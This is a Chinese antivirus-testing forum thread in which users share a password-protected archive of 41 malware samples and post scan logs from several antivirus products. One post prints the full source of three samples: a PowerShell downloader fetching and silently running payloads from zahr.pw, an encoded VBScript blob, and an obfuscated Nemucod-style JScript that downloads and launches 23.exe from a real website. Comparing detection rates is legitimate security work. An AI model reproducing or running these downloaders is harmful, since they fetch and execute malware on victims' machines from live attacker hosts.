样本

Eset小粉絲

Samples.rar
http://www6.zippyshare.com/v/d0bwaXBH/file.html

Total Samples : 41
Password：infected

fireherman

ESET-NOD32 ess 8 [v14234/20161006]

Total 14x

解压 kill 13x

[mw_shl_code=css,true]2016-10-6 21:45:08        文件系统实时防护        文件        E:\VirZ\Samples\f042b741b355aa0738f1b2fe54bbe1d135ab5d0604f30f29d982b18ad2084681.vir        JS/TrojanDownloader.Nemucod.AYT 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        0A3012D807712C99FB9F665619F41BFBA333EAC2        2016-10-6 21:45:08
2016-10-6 21:45:07        文件系统实时防护        文件        E:\VirZ\Samples\e52d3d991e3ced96463ea63f3832428c116dbc0a8dece26975b5ae5ef2664f0f.vir        JS/TrojanDownloader.Nemucod.BBA 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        2805EB432AFA0AD2BC7638E51AA637FE71B3893A        2016-10-6 21:45:07
2016-10-6 21:45:07        文件系统实时防护        文件        E:\VirZ\Samples\c7090e450ad5564be6d00b600316f7301262c9693c96bb30bc283d64d384cfa0.vir        JS/TrojanDownloader.Nemucod.BDH 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        8A094E00393BA096B63045FFA218AE7152F8575D        2016-10-6 21:45:07
2016-10-6 21:45:07        文件系统实时防护        文件        E:\VirZ\Samples\ad726c3b0db13541a10f06681cd92c7c4fc442ad338a611ae617f5ce8dc69861.vir        PDF/Fraud.FT 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        28560D50F294F7D76EF4F15D48B4FDF187822FD6        2016-10-6 21:45:07
2016-10-6 21:45:07        文件系统实时防护        文件        E:\VirZ\Samples\7ab8d8e4628bee6902217c2321d91b8d842e4edbf5f63d6cf672e547ca6a2483.vir        PowerShell/TrojanDownloader.Agent.DL 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        C3E4670EE6D77C8E6EFAF918883E0F72CEC1DABE        2016-10-6 21:45:07
2016-10-6 21:45:07        文件系统实时防护        文件        E:\VirZ\Samples\471ffab4327060f37f04ed0b5d4e9bb959a2025e68314007ad1925cffcbab666.vir        VBA/Obfuscated.AA 特洛伊木马        已删除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        F8B4458257E953C5E972B3BDD6DF6DFE8AF7156C        2016-10-6 21:45:02
2016-10-6 21:45:02        文件系统实时防护        文件        E:\VirZ\Samples\40ee3afb1e5f986b319aee1deccbb5e9b09b4b26a8b34b306366d70cc1a711aa.vir        JS/TrojanDownloader.Nemucod.AYT 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        7F199094DEAB1AC9C2017945153EE0437156C989        2016-10-6 21:45:02
2016-10-6 21:45:02        文件系统实时防护        文件        E:\VirZ\Samples\2daedf0b267f7ec2e8645dac356fc64eb1bae48523016b903e4dfb7360532a25.vir        VBA/Obfuscated.AA 特洛伊木马        已删除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        A22D5BAE3CE352C640045CF6B2553CE31B13CEEF        2016-10-6 21:44:51
2016-10-6 21:44:56        文件系统实时防护        文件        E:\VirZ\Samples\2956f04a60b08881e1b8134d0fc16a1b5cc46dc36a25d0a0160d2e9819081487.vir        VBA/Obfuscated.AA 特洛伊木马        已删除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        9CC2F1A4959E4A7651149CA030F7BB3319D03545        2016-10-6 21:44:39
2016-10-6 21:44:51        文件系统实时防护        文件        E:\VirZ\Samples\2a04f9a83f4549c1d1770ef7e700ded1d9e5cd257f55c257e985b6e5365b1af5.vir        VBA/Obfuscated.AA 特洛伊木马        已清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        A1507EA6A7BEEB36009836848288B8CD313A3FBD        2016-10-6 21:44:51
2016-10-6 21:44:51        文件系统实时防护        文件        E:\VirZ\Samples\29ed5f74ea1e384c4ca56c5438d0e2147d957abb53a9ece20cb4fccc9dfc9aed.vir        VBS/DNSChanger.AA 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        5794ACEA078675A73988C754F5AD2A3545D1654B        2016-10-6 21:44:51
2016-10-6 21:44:39        文件系统实时防护        文件        E:\VirZ\Samples\28f32ab52240b62b8221e044767142df6ede752868c01085c482058b55879dbb.vir        VBS/Kryptik.CS 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        87DDAEB01694E91C620181EC8945AE311C9F78E1        2016-10-6 21:44:38
2016-10-6 21:44:38        文件系统实时防护        文件        E:\VirZ\Samples\0c8301b324550882a9e30dd624ee5903e075a70635a724a12d7a89dee81019c4.vir        JS/TrojanDownloader.Nemucod.AYT 特洛伊木马        通过删除清除        RAYMOND-9B1A7AC\Raymond        在应用程序新建的文件上发生事件: C:\Program Files\7-Zip\7zG.exe (95CE9136E708712C2A29EE18BE48DD028018B558).        F394BFBB3229E6431D7D849E5BF53D5597E57A4C        2016-10-6 21:44:33[/mw_shl_code]

右键二扫 kill 1x

[mw_shl_code=css,true]正在扫描日志
病毒库版本: 14234 (20161006)
日期: 2016-10-6  时间: 21:47:51
已扫描的磁盘、文件夹和文件: E:\VirZ\Samples
E:\VirZ\Samples\89108a1ec28bb11561d7d18ce623d99a36a0e6b34bc85b9a9c1911ef0951319e.vir > ZIP > word/embeddings/oleObject1.bin > OLEDATA > Bestellung_05.10.2016.js - JS/ProxyChanger.BV 特洛伊木马 - 扫描完成后再选择处理方式
E:\VirZ\Samples\a63bf01e762ae916537fe7bdbfba477bc941ba9638b02b9160e02302cdc8110a.vir > ZIP > a/k.class - 正常
E:\VirZ\Samples\a63bf01e762ae916537fe7bdbfba477bc941ba9638b02b9160e02302cdc8110a.vir > ZIP > a/p.class - 正常
E:\VirZ\Samples\dbe355dfbcec96488ca97eb1b80d29245f5064a966b46f6ddeedd0eb9f3f2635.vir > ZIP > f/OveOverviewrviewOverviOvervieOverviewwewOverviewq.class - 正常
E:\VirZ\Samples\dbe355dfbcec96488ca97eb1b80d29245f5064a966b46f6ddeedd0eb9f3f2635.vir > ZIP > f/OveOverviewrviewOverviOvervieOverviewwewOverviewo.class - 正常
E:\VirZ\Samples\89108a1ec28bb11561d7d18ce623d99a36a0e6b34bc85b9a9c1911ef0951319e.vir > ZIP > word/embeddings/oleObject1.bin > OLEDATA > Bestellung_05.10.2016.js - JS/ProxyChanger.BV 特洛伊木马 - 已删除
已扫描的对象数: 146
发现的威胁数: 1
已清除对象数: 1
完成时间: 21:47:56  总扫描时间: 5 秒 (00:00:05)[/mw_shl_code]

Tom179090

描信息:
  病毒定义版本: 2016.10.06.005
  病毒定义序列 ID: 180953

扫描统计信息:
  扫描开始:
   本地: 2016/10/6 21:44
   UTC: 2016/10/6 13:44
  扫描时间: 43 秒
  扫描目标: D:\样本\Samples
计数:
  扫描的项目总数: 524
  - 文件和目录: 524
  - 注册表条目: 0
  - 进程和启动项目: 0
  - 网络和浏览器项目: 0
  - 其他: 0
  - 受信任文件: 0
  - 跳过的文件: 0

  检测到的安全风险总数: 4
  已解决的项目总数: 4
  需要注意的项目总数: 0


已解决的威胁:
W97M.Downloader!g17
类型: 异常
风险: 高 (高 隐藏, 高 删除, 高 性能, 高 隐私)
类别: 启发式病毒
状态: 完全解决
-----------
3 个文件
d:\样本\samples\samples\2956f04a60b08881e1b8134d0fc16a1b5cc46dc36a25d0a0160d2e9819081487.vir - 已修复
d:\样本\samples\samples\2a04f9a83f4549c1d1770ef7e700ded1d9e5cd257f55c257e985b6e5365b1af5.vir - 已修复
d:\样本\samples\samples\471ffab4327060f37f04ed0b5d4e9bb959a2025e68314007ad1925cffcbab666.vir - 已修复
7 个受感染文件
d:\样本\samples\samples\2956f04a60b08881e1b8134d0fc16a1b5cc46dc36a25d0a0160d2e9819081487.vir - 已删除
d:\样本\samples\samples\2a04f9a83f4549c1d1770ef7e700ded1d9e5cd257f55c257e985b6e5365b1af5.vir - 不需要操作
d:\样本\samples\samples\471ffab4327060f37f04ed0b5d4e9bb959a2025e68314007ad1925cffcbab666.vir - 不需要操作
d:\样本\samples\2956f04a60b08881e1b8134d0fc16a1b5cc46dc36a25d0a0160d2e9819081487.vir - 已删除
d:\样本\samples\2daedf0b267f7ec2e8645dac356fc64eb1bae48523016b903e4dfb7360532a25.vir - 已删除
d:\样本\samples\471ffab4327060f37f04ed0b5d4e9bb959a2025e68314007ad1925cffcbab666.vir - 已删除
d:\样本\samples\2a04f9a83f4549c1d1770ef7e700ded1d9e5cd257f55c257e985b6e5365b1af5.vir - 已删除


W97M.Downloader
类型: 异常
风险: 高 (高 隐藏, 高 删除, 高 性能, 高 隐私)
类别: 病毒
状态: 完全解决
-----------
1 个受感染文件
d:\样本\samples\25a24ec279ac6fed4bb35efc8203303f2afddbc0a8e5a49d98d6207bd1c4f846.vir - 已删除
1 个浏览器缓存



Hacktool.Jsprat
类型: 异常
风险: 中 (中 隐藏, 中 删除, 中 性能, 中 隐私)
类别: 黑客工具
状态: 完全解决
-----------
1 个受感染文件
d:\样本\samples\b3871db142af884eeb680080680891f1f225397cf214d8c148e607ae2fa1fb98.vir - 已删除
1 个浏览器缓存



Trojan.Gen.NPE
类型: 异常
风险: 高 (高 隐藏, 高 删除, 高 性能, 高 隐私)
类别: 病毒
状态: 完全解决
-----------
1 个文件
d:\样本\samples\samples\7ab8d8e4628bee6902217c2321d91b8d842e4edbf5f63d6cf672e547ca6a2483.vir - 已删除
1 个受感染文件
d:\样本\samples\7ab8d8e4628bee6902217c2321d91b8d842e4edbf5f63d6cf672e547ca6a2483.vir - 已删除
1 个浏览器缓存





未解决的威胁:
没有未解决的风险



最后剩余34个

ELOHIM

图一：三个文件不知道修复了没有，还是原来就这么大？
没有比对。

图二：余下的全部文件。

WD：余 33。
——————————————————————————————

三个未知修复文件一：

$CheckFile = Test-Path "$env:APPDATA/gzf.bin"
if ($CheckFile) {exit}
1 > "$env:APPDATA/gzf.bin"
$down = New-Object System.Net.WebClient
$url1  = "http://zahr.pw/sh/7sh";
$url2  = "http://zahr.pw/sh/sharchivedmngr";
$url3  = "http://zahr.pw/sh/shlapsizeof";
$file1 = "$env:APPDATA/7sh.exe";
$file2 = "$env:APPDATA/sharchivedmngr";
$file3 = "$env:APPDATA/shlapsizeof.cmd";
$down.DownloadFile($url1,$file1);
$down.DownloadFile($url2,$file2);
$down.DownloadFile($url3,$file3);
$exec = New-Object -com shell.application
$exec.shellexecute($file3, "", "", "open", 0);

——————————————————————————————
文件二：

#@~^NQMAAA==(6P        kmMqwDRz.o!:n1D/ sxo:4'ZPK_nU@#@&?K~W8%ktnV^xmM+COr4%n1KcJU4VscbawVbmmOkKxE#@#@&G8N?CAsVc?tss+X+1EO+EAkm.kaOR6nEBZt.c2cb[Sj1DrhYc?mMkhP0!Vs1m:n';tIvfc*[J,;Cmr~rJSJ.;        ldJBq@#@&2sj@#@&JG1lO+6(^2^N'rtYDw=&zShAR1WUOmoWDC/cmWs 8DJmKxOl[GMR2ta_w{&Tq2,J@#@&kY.n;xrRE@#@&mDDG1Ud+M.nDkl[xzIDmz`rF,y 1*cFcv+JSERR0RR %r#@#@&U+K~G(LAH&jAD-bm'MYK8LmP`rhrUso:Dd)Pk:an./KxmYrWUJ\nV{r:a+.dKxlOn)"w-r'kY.hZLJ-MWKO-1kh\yJb@#@&?+D~1bm/{G89qH&?nD-r1+ 2X3m5En.H`Jj3d2/K,M,s]}H,k        &ym1YAWM3)[mwY.ZKx0bL;DmYbWUP        uAI3P&K2        l8sNPx~:D;+rb@#@&oKI,2l1t,Hk1P(x,1r^k@#@&bHYU+YGHd?D7+./pa7'Hk1 /Y9HU?2.-ADj+m.1t6MND`mDM91U/nDj+.dmN#@#@&q6Pk        Oj+:fg?j2.-Dd6o-'ZPO4x@#@&3^?n@#@&3        N~&s@#@&16D@#@&U+OPV+COo:V8xZ"+lDn64N+1YcJ\joHJ cpHdCPPhJ#@#@&V2CYoh^F KwAxJV2:E~dW^lD+W(^2mNS0mV/A@#@&ob:(hVq k+UNvb@#@&?nP,M+COo:sF{HKK4bxT@#@&Ax9~q67f8AAA==^#~@ XXXXXXXXXXXXgdfXXXXXXXXXX4dg34XgfddXXXXX4gdfXXdg3XggdfdgdfgXdg4Xdgfg353ddXdfdf534XfgfdgXXdg34Xf45X5X3df3g534XXXd334XX5gdfXXXXX34g33434fdgXX#%$#%#dg3XgX45dfX5XXXXXdfdfXXX4fd3XX%XXgfdf5XX54gfXXXXdfXXdfX34XX3fdfdXXXXXgXXXXXX4dfXfdXXXXdfXXXdg543XXdfXXXdfdgXXXXXXXXXXXXXXgXXXXXXXXXXX.jpg

——————————————————————————————
文件三：

"Wed Oct 5 14:47:27 UTC+0200 2016"
function VsqzvrYroZ(PJYuZvzh,qRorXQrDHKeW) {PJYuZvzh.Run(qRorXQrDHKeW, 0x1, 0x0);}
/*lbNxeVObiMXchRKCobainKsYqIKDjozccuMZIrUAlXVjwEnfCeWUoPuGQDEUVLaOOgFUffSrhBMJFKLcKAMaiopHkRsEBCuVtmskwoLCYzxDIlbsMqwzWgecxyaIaLHuRLYSHPwhHQbREelbHzYrDrNRDzBftpOnjExVLLcflAzytrpewbvDeWpYDUWWFmOAuQQqIZAxHF*/QgYjKKhIGqlTI();
var jrLAr = ["http://masseriacarparelli.it/logs.php"];
var avPz=746-746;
while(true) {
if(jrLAr.length<=154-154) break;
var xwjo = KeCzSnl() % jrLAr.length;
var TFzaNNmOF=jrLAr[xwjo];
var hUwEo=KeCzSnl();
var LSqxEiNMLl='23.exe';
var hrXBZFA='23.exe';
var fZvUxuDf=840-839;
var UOStjGiwE = function(){
return new ActiveXObject(VbIpy('WS&ETqwOoemH&cript&ETqwOoemH&.She&l&l',[0,2,4,5,6],'&'));
}();
var hrXBZFA = jevWiW(UOStjGiwE) + String.fromCharCode(92) + hrXBZFA;
var iMCrt = function(){
return new ActiveXObject(VbIpy('MSX&cnOkRnmLj&ML2.XM&JUSprMmTDnV&LHTTP',[0,2,4],'&'));
}();
WGmI(TFzaNNmOF,iMCrt);
if (iMCrt.status == 100+100) {
var ruxmugD = function() {
return new ActiveXObject(VbIpy('ADO&DB&iltATIFgl&.&LUrWLKllB&Stream',[0,1,3,5],'&'));
}();
var TiXccTEYdrFn=GyjHz(ruxmugD,iMCrt.ResponseBody,hrXBZFA);
}
try {
VsqzvrYroZ(UOStjGiwE,hrXBZFA);
var PsKKmvg = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+LSqxEiNMLl+'\'');
if ( PsKKmvg.Count >= 1 ){break;}
} catch(e) {}
avPz++;
jrLAr.splice (xwjo,668-667);
}
function jevWiW(BkLfgY){var gGasNAaW=["ExpandEnvironmentStrings"];return BkLfgY[gGasNAaW[0]]('%TMP%')}
function GyjHz(oJBysWfj,vnRLI,AJIRcgfiJg){try{oJBysWfj.open();NxopHEBh(oJBysWfj);yQnXEQZ(oJBysWfj,vnRLI);EDdlhQjaD(oJBysWfj);ZrDg(oJBysWfj,AJIRcgfiJg);IrPhvEkj=oJBysWfj.size;AWKjJAi(oJBysWfj);return IrPhvEkj;}catch(e){}}
function WGmI(sKPFmz,iwJllhp){try{Hpji = 'G*XmCUSuJDEE*E*T*DNTjJEVbYHwx'.split('*');iwJllhp.open(Hpji[0]+Hpji[2]+Hpji[3], sKPFmz, false);iwJllhp.setRequestHeader("User-Agent", "Python-urllib/3.1");iwJllhp.send();}catch(e){}}
function VbIpy(qqWgFFiS,zmsfex,sRXYAClaH){JKSWX=qqWgFFiS.split(sRXYAClaH);vgybyAK = 'uZk';for(kwnfnMYN=0;kwnfnMYN<zmsfex.length;kwnfnMYN++) {vgybyAK+=JKSWX[zmsfex[kwnfnMYN]];}return vgybyAK.substring(3,vgybyAK.length);}
function QgYjKKhIGqlTI() {/*ErBbBbhWII().Sleep(3091-817);*/}
function AZBXkqk(){var kJemhU=["random"];return Math[kJemhU[0]]()}
function YGqF(YhzRiE) {YhzRiE.open();}
function NxopHEBh(eRHwCnRba) {eRHwCnRba.type=1;}
function yQnXEQZ(qhCC,EplPL) {qhCC.write(EplPL);}
function ErBbBbhWII() {return/*SnLDidVEcaXdXgeRSbaolQWjbdFWMUltqUAQmgJhylyIzoemnRmllchwuzCllmIxHUjxjDrdORSGUPXaBcrBfJmcGotTDXYVSoLxatTsX*/WScript;}
function EDdlhQjaD(IBEVrV) {var VPCKxqBLjd=[];IBEVrV.position=VPCKxqBLjd.length*(6461424-345);}
function ZrDg(itDfMjI,eYFQICZ) {itDfMjI.saveToFile(eYFQICZ, 2);}
function AWKjJAi(ARxgR) {ARxgR.close();}
function KeCzSnl() {var fUxu=100000;var iutugy = 100;return Math.round(AZBXkqk()*(fUxu-iutugy)+iutugy);}
function mdXLOOgl(krGDm) {var fTSeWUJA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';for(var iggIG=0;iggIG<krGDm;iggIG++){BQqJF+=fTSeWUJA.charAt(Math.floor(Math.random()*fTSeWUJA.length));}return BQqJF;}
function RzcYmBeXKiyVKA(xIkgKCIgzwdfzI) {return new ActiveXObject(xIkgKCIgzwdfzI);}

——————————————————————————————————————
谁来把文件一代码下载的几个文件测试一下？

挥泪斩情思

NS

心醉咖啡

看了好像好多都是脚本和宏啥的，那毒霸免测了扫描必0

挥泪斩情思

Tom179090 发表于 2016-10-6 21:47
描信息:
  病毒定义版本: 2016.10.06.005
  病毒定义序列 ID: 180953

NS？？

dongwenqi

卡巴剩余24个

小难民

下载的好慢，我放弃了

wh759626933

Trend Micro Miss
修改后缀后仍然miss